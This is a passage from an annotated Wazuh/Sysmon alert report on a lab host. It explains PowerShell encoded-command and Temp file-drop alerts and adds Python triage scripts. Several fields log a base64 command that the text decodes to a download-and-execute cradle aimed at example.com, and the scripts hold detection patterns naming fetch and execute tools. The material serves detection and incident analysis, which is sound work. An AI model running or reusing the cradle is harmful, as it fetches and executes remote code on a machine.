data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's command line – identical to the child's, so each stage re-runs the same cradle. Work out what the fetched content does before closing.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account of the parent. Same user, so no token change between parent and child.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
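First step for any -EncodedCommand alert is to read the command. The script below is an added example, not part of the SOCscribe report or the Wazuh rule set; it decodes the blob the way PowerShell built it (base64 over UTF‑16LE), pulls out URLs and stealth switches, and gives a download‑cradle verdict (remote fetch plus in‑memory execution). The sample command line is constructed from the CommandLine value in the alert above; the list of -EncodedCommand abbreviations and the indicator patterns are assumptions you should extend to your own telemetry.

```python
"""Decode and triage a PowerShell -EncodedCommand taken from a Sysmon EID 1 CommandLine.

Added example, not part of the SOCscribe report or the Wazuh rule set.
"""
import base64
import re
from typing import Dict, Optional

# Constructed sample: the CommandLine value logged in the alert above.
SAMPLE_COMMANDLINE = (
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAp"
    "AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEA"
    "bQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# abbreviations commonly seen (assumption: extend if your telemetry shows others).
ENC_SWITCH = re.compile(
    r"(?i)(?:^|\s)[-/](?:encodedcommand|encoded|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})"
)

# A download cradle = a remote fetch AND in-memory execution in the same script.
FETCH = re.compile(
    r"(?i)net\.webclient|download(?:string|file|data)|invoke-webrequest|invoke-restmethod"
    r"|\b(?:iwr|irm|curl|wget)\b"
)
EXEC = re.compile(r"(?i)\b(?:iex|invoke-expression)\b|\[scriptblock\]::create|invoke-command")
URL = re.compile(r"(?i)https?://[^\s'\")]+")

STEALTH_SWITCHES = ("-NoProfile", "-NonInteractive", "-WindowStyle Hidden", "-ExecutionPolicy Bypass")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries -EncodedCommand, else None."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped base64 padding
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None  # not a PowerShell encoded command (or corrupted in transit)


def triage(cmdline: str) -> Dict[str, object]:
    """Summarise what an analyst needs: decoded script, URLs, stealth switches, cradle verdict."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    lowered = cmdline.lower()
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "urls": URL.findall(script),
        "stealth_switches": [s for s in STEALTH_SWITCHES if s.lower() in lowered],
        "download_cradle": bool(FETCH.search(script) and EXEC.search(script)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_COMMANDLINE).items():
        print(f"{key}: {value}")
```

Run it against the CommandLine of every EID 1 alert in the report; the URL list is what you take to the proxy and DNS logs, and a `download_cradle` of True means the next question is what https://example.com/test actually served, which no Sysmon field will tell you.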

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:58.283+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.283+0000
When the Wazuh manager generated the alert – not when the event happened on the host (see data.win.eventdata.utcTime / systemTime, roughly a minute earlier here). Use it to line up alerts within this report, and the Sysmon time to line up with the host.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. Check it against TargetFilename before acting: here the "executable" is a .ps1 in the user's Temp folder, and it is PowerShell's own policy‑test file, not a payload.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1073340
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the eventdata follows Sysmon's schema, not the native Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Provider GUID; constant for Sysmon. Only useful as a filter.

data.win.system.eventID:  11
Sysmon Event ID, not a Security‑log ID: 11 = FileCreate (1 = ProcessCreate, 3 = NetworkConnect, 13 = RegistryValueSet).

data.win.system.version:  2
Schema version of this event ID. Bumps when Sysmon adds fields to the event.

data.win.system.level:  4
Numeric event level: 4 = Informational. Sysmon logs everything at 4; severity comes from the Wazuh rule, not from the event.

data.win.system.task:  11
Task category. For Sysmon the task number equals the Event ID (11 = FileCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:04.6354631Z
When the event was written to the channel. Should be within milliseconds of utcTime; a large gap means log latency or a clock problem.

data.win.system.eventRecordID:  282462
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event – the Sysmon service (3712), not the subject. Don't confuse with eventdata.processId.

data.win.system.threadID:  4740
Thread ID inside the Sysmon service that wrote the event. No investigative value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel. Sysmon/Operational must be collected by the agent for any of these alerts to exist.

data.win.system.computer:  Attacker
Computer name from the event itself. Should equal agent.name; a mismatch means forwarded or relabelled logs.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:04.632 ProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00} ProcessId: 11368 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zrwibxxr.3hb.ps1 CreationUtcTime: 2025-04-24 22:36:04.632 User: Attacker\Attcker1"
Sysmon's rendered FileCreate (EID 11) text. The file is __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder: PowerShell writes this probe on every start‑up to test AppLocker/WDAC script enforcement. On its own it is expected noise; the rule fires on ".ps1 in Temp", not on content. What matters is the creator: the ProcessGuid is the encoded‑command PowerShell from the previous alert.

data.win.eventdata.utcTime:  2025-04-24 22:36:04.632
Sysmon's UTC timestamp of the file creation – 1.5 s after the process start in the previous alert.

data.win.eventdata.processGuid:  {94294ddc-bcd3-680a-c80a-000000000e00}
GUID of the creating process. Identical to the processGuid of the EID 1 above (PID 11368) – that is how you tie this file to the encoded command.

data.win.eventdata.processId:  11368
PID of the creating process. Same as the EID 1 above; pivot on the GUID, not the PID.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file. PowerShell writing its own policy‑test file is normal; any other image writing a probe‑named file is not.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zrwibxxr.3hb.ps1
Path of the created file. The pattern __PSScriptPolicyTest_xxxxxxxx.xxx.ps1 in %TEMP% is PowerShell's own AppLocker/WDAC probe. Treat a different name, a different extension, or a non‑PowerShell creator as a real drop.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:04.632
File's creation timestamp. Normally equals utcTime; if it is older, an existing file was overwritten or the creation time was altered.

data.win.eventdata.user:  Attacker\\Attcker1
Account that created the file. Same local account as the process chain.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
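Rule 92213 fires on file extension and folder, so a triage pass needs to separate PowerShell's own policy probe from a genuine drop and still hand you the ProcessGuid to pivot on. The classifier below is an added example, not SOCscribe's or Wazuh's code. The first two events are constructed from the TargetFilename values in this report; the third (update.exe) is a hypothetical drop added to show the other branch. The extension list is an assumption.

```python
"""Classify Sysmon EID 11 (FileCreate) hits from the "file dropped in folder commonly used
by malware" rule. Added example, not SOCscribe's or Wazuh's code.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# PowerShell writes an empty __PSScriptPolicyTest_<8 chars>.<3 chars>.ps1 into %TEMP%
# each time it starts, to probe AppLocker/WDAC script enforcement. Expected noise.
PS_POLICY_PROBE = re.compile(r"(?i)\\__PSScriptPolicyTest_[a-z0-9]{8}\.[a-z0-9]{3}\.ps1$")
USER_TEMP = re.compile(r"(?i)^[a-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\")
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Assumption: extensions worth a look when they land in a user's Temp folder.
DROP_EXTENSIONS = {".exe", ".dll", ".scr", ".ps1", ".vbs", ".js", ".hta", ".bat", ".cmd"}


@dataclass
class FileCreate:
    process_guid: str
    image: str
    target_filename: str
    user: str


def classify(ev: FileCreate) -> Dict[str, str]:
    image_name = ev.image.rsplit("\\", 1)[-1].lower()
    name = ev.target_filename.rsplit("\\", 1)[-1]
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    in_user_temp = USER_TEMP.match(ev.target_filename) is not None
    is_probe = PS_POLICY_PROBE.search(ev.target_filename) is not None
    by_powershell = image_name in POWERSHELL_IMAGES

    if is_probe and by_powershell:
        verdict = "expected_noise"
        reason = "PowerShell AppLocker/WDAC policy probe written at interpreter start-up"
    elif is_probe:
        # A probe-shaped name from anything but PowerShell is someone hiding in the noise.
        verdict = "investigate"
        reason = f"probe-named file but creator is {image_name}, not PowerShell"
    elif in_user_temp and ext in DROP_EXTENSIONS:
        verdict = "investigate"
        reason = f"{ext} written to user Temp by {image_name}"
    else:
        verdict = "review"
        reason = "outside the probe pattern; judge by path and creator"
    # Even for noise the creator matters: the probe proves a PowerShell process started,
    # so always return the GUID to join against EID 1.
    return {"verdict": verdict, "reason": reason, "pivot_process_guid": ev.process_guid}


PS = r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\Attcker1\AppData\Local\Temp"
# Constructed samples: the two alerts in this report, plus one hypothetical genuine drop.
SAMPLES: List[FileCreate] = [
    FileCreate("{94294ddc-bcd3-680a-c80a-000000000e00}", PS,
               TEMP + r"\__PSScriptPolicyTest_zrwibxxr.3hb.ps1", r"Attacker\Attcker1"),
    FileCreate("{94294ddc-bcd5-680a-cc0a-000000000e00}", PS,
               TEMP + r"\__PSScriptPolicyTest_4b14azk2.mml.ps1", r"Attacker\Attcker1"),
    FileCreate("{00000000-0000-0000-0000-000000000000}", PS,  # hypothetical
               TEMP + r"\update.exe", r"Attacker\Attcker1"),
]

if __name__ == "__main__":
    for ev in SAMPLES:
        print(ev.target_filename.rsplit("\\", 1)[-1], "->", classify(ev))
```

The verdict is per file, not per host: both probe events here are noise as files, but each one is also proof that another encoded‑command PowerShell started, so the pivot GUID is the part of the output you act on.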

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:58.880+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.880+0000
When the Wazuh manager generated the alert – not when the process started on the host (see data.win.eventdata.utcTime, about 53 s earlier). Use it to line up alerts within this report, and the Sysmon time to line up with the host.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534218.1076109
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the eventdata follows Sysmon's schema, not the native Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Provider GUID; constant for Sysmon. Only useful as a filter.

data.win.system.eventID:  1
Sysmon Event ID, not a Security‑log ID: 1 = ProcessCreate, the Sysmon counterpart of Security 4688 with hashes, ProcessGuid and parent details added.

data.win.system.version:  5
Schema version of this event ID (EID 1 v5 includes ParentUser). Bumps when Sysmon adds fields.

data.win.system.level:  4
Numeric event level: 4 = Informational. Sysmon logs everything at 4; severity comes from the Wazuh rule, not from the event.

data.win.system.task:  1
Task category. For Sysmon the task number equals the Event ID (1 = ProcessCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:06.3023920Z
When the event was written to the channel, about 0.9 s after utcTime here. A large gap means log latency or a clock problem.

data.win.system.eventRecordID:  282529
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event – the Sysmon service (3712), not the subject. Don't confuse with eventdata.processId.

data.win.system.threadID:  4740
Thread ID inside the Sysmon service that wrote the event. No investigative value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel. Sysmon/Operational must be collected by the agent for any of these alerts to exist.

data.win.system.computer:  Attacker
Computer name from the event itself. Should equal agent.name; a mismatch means forwarded or relabelled logs.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:05.384 ProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} ProcessId: 11096 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00} ParentProcessId: 11368 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Sysmon's rendered Process Create (EID 1) text, parsed into the data.win.eventdata.* fields below. Same encoded command as the earlier alert (it decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test')), but this time the parent is PID 11368 – the process from that alert. The chain is now 12264 → 11368 → 11096, each stage running the identical cradle.

data.win.eventdata.utcTime:  2025-04-24 22:36:05.384
Sysmon's own UTC timestamp for the process start, 2.3 s after the parent (11368) started. Order events by this, not by `timestamp`.

data.win.eventdata.processGuid:  {94294ddc-bcd5-680a-cc0a-000000000e00}
Sysmon's stable GUID for this process. The next EID 11 alert carries this same GUID as its creator.

data.win.eventdata.processId:  11096
Process ID. Reused after exit, so pivot on ProcessGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable: Windows PowerShell 5.1 again. Compare with OriginalFileName below to catch renamed copies.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the PE version resource; same build as the parent.

data.win.eventdata.description:  Windows PowerShell
Description from the PE version resource. Trivial to forge; corroborate with the hash.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version resource. Informational only.

data.win.eventdata.company:  Microsoft Corporation
Company from the PE version resource. Informational only.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal file name from the PE resource. Matches Image, so no renaming.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line, byte‑for‑byte the same as the parent's: -NoLogo -NoProfile -EncodedCommand with the blob that decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). A script that keeps relaunching itself this way will keep producing these alerts until the process tree is killed.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process; the user's profile root, inherited from the parent.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as – the same local account (prefix = computer name) as the parent.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Logon session GUID; unchanged from the parent. Pivot to Security 4624 for the logon type.

data.win.eventdata.logonId:  0x26584
Hex LogonId of the same session, as used by Security events 4624/4634.

data.win.eventdata.terminalSessionId:  1
Windows session number. 1 = interactive desktop session (console or RDP).

data.win.eventdata.integrityLevel:  Medium
Token integrity level. Medium = not elevated. Still no privilege escalation.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the Image file; same as the parent, i.e. the same powershell.exe binary.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd3-680a-c80a-000000000e00}
GUID of the parent process – the processGuid of PID 11368 from the earlier EID 1 alert.

data.win.eventdata.parentProcessId:  11368
Parent PID 11368, whose own EID 1 is in this report (its parent in turn was 12264).

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Parent executable: PowerShell spawning PowerShell, the pattern rule 92057 keys on.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's command line, identical to the child's. Combined with the earlier alert this is at least three generations of the same encoded command.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account of the parent. Same user, no token change.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
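The three Sysmon alerts so far describe one chain (12264 → 11368 → 11096) plus the files each stage wrote, and the only field that joins them reliably is ProcessGuid. The script below is an added example, not SOCscribe's or Wazuh's code: it rebuilds that tree from EID 1 and EID 11 events, creates a stub node for a parent whose own EID 1 was never collected (12264 here), and counts how many consecutive ancestors ran the identical command line, which is the self‑relaunch pattern these alerts show. Events are constructed from the eventdata fields in this report; the -EncodedCommand blob is replaced by a short placeholder because only equality between parent and child matters to the logic.

```python
"""Rebuild a process chain by joining Sysmon EID 1 (ProcessCreate) and EID 11 (FileCreate)
on ProcessGuid. Added example, not SOCscribe's or Wazuh's code.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Placeholder for the base64 blob shown in the alerts; only parent/child equality matters here.
CRADLE = f'"{PS}" "{PS}" -NoLogo -NoProfile -EncodedCommand <blob-from-alert>'

# Constructed from the EID 1 / EID 11 alerts in this section (Wazuh field names kept).
EID1_EVENTS = [
    {"utcTime": "2025-04-24 22:36:03.117", "processGuid": "{94294ddc-bcd3-680a-c80a-000000000e00}",
     "processId": 11368, "image": PS, "commandLine": CRADLE,
     "parentProcessGuid": "{94294ddc-bcd0-680a-c60a-000000000e00}", "parentProcessId": 12264,
     "parentImage": PS, "parentCommandLine": CRADLE},
    {"utcTime": "2025-04-24 22:36:05.384", "processGuid": "{94294ddc-bcd5-680a-cc0a-000000000e00}",
     "processId": 11096, "image": PS, "commandLine": CRADLE,
     "parentProcessGuid": "{94294ddc-bcd3-680a-c80a-000000000e00}", "parentProcessId": 11368,
     "parentImage": PS, "parentCommandLine": CRADLE},
]
EID11_EVENTS = [
    {"utcTime": "2025-04-24 22:36:04.632", "processGuid": "{94294ddc-bcd3-680a-c80a-000000000e00}",
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zrwibxxr.3hb.ps1"},
    {"utcTime": "2025-04-24 22:36:06.494", "processGuid": "{94294ddc-bcd5-680a-cc0a-000000000e00}",
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4b14azk2.mml.ps1"},
]


@dataclass
class Proc:
    guid: str
    pid: int
    image: str
    cmdline: str
    parent_guid: Optional[str] = None
    utc_time: Optional[str] = None  # None when known only from a child's Parent* fields
    files: List[str] = field(default_factory=list)
    children: List[str] = field(default_factory=list)


def build_tree(eid1: List[dict], eid11: List[dict]) -> Dict[str, Proc]:
    procs: Dict[str, Proc] = {}
    for e in eid1:
        procs[e["processGuid"]] = Proc(e["processGuid"], e["processId"], e["image"],
                                       e["commandLine"], e["parentProcessGuid"], e["utcTime"])
    # Parents without an EID 1 of their own (started before collection, or filtered out)
    # become stub nodes so the chain still reaches the earliest known ancestor.
    for e in eid1:
        pg = e["parentProcessGuid"]
        if pg not in procs:
            procs[pg] = Proc(pg, e["parentProcessId"], e["parentImage"], e["parentCommandLine"])
        procs[pg].children.append(e["processGuid"])
    for f in eid11:
        if f["processGuid"] in procs:
            procs[f["processGuid"]].files.append(f["targetFilename"])
    return procs


def lineage(procs: Dict[str, Proc], guid: str) -> List[int]:
    """PIDs from the earliest known ancestor down to `guid`."""
    chain: List[Proc] = []
    seen: Set[str] = set()  # guards against corrupt data that loops
    cur: Optional[str] = guid
    while cur in procs and cur not in seen:
        seen.add(cur)
        chain.append(procs[cur])
        cur = procs[cur].parent_guid
    return [p.pid for p in reversed(chain)]


def identical_ancestors(procs: Dict[str, Proc], guid: str) -> int:
    """Consecutive ancestors that ran exactly the same command line (self-relaunch loops)."""
    n = 0
    seen: Set[str] = {guid}
    cur = procs[guid]
    while cur.parent_guid in procs and cur.parent_guid not in seen:
        parent = procs[cur.parent_guid]
        if parent.cmdline != cur.cmdline:
            break
        n += 1
        seen.add(parent.guid)
        cur = parent
    return n


if __name__ == "__main__":
    tree = build_tree(EID1_EVENTS, EID11_EVENTS)
    leaf = "{94294ddc-bcd5-680a-cc0a-000000000e00}"
    print("chain:", " -> ".join(str(pid) for pid in lineage(tree, leaf)))
    print("identical ancestors:", identical_ancestors(tree, leaf))
    for p in tree.values():
        print(p.pid, p.utc_time or "(no EID 1 collected)", p.files)
```

Feed it every EID 1 and EID 11 from the same agent and logon session and the stub node tells you where your collection window starts: a root with no utc_time is a process you still have to find, either in older Sysmon records or in Security 4688.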

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:58.949+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:58.949+0000
When the Wazuh manager generated the alert – not when the file was created on the host (see data.win.eventdata.utcTime, about 52 s earlier). Use it to line up alerts within this report, and the Sysmon time to line up with the host.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. Check it against TargetFilename before acting: as in the earlier 92213 hit, the file is PowerShell's own __PSScriptPolicyTest .ps1 in Temp, not a payload.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
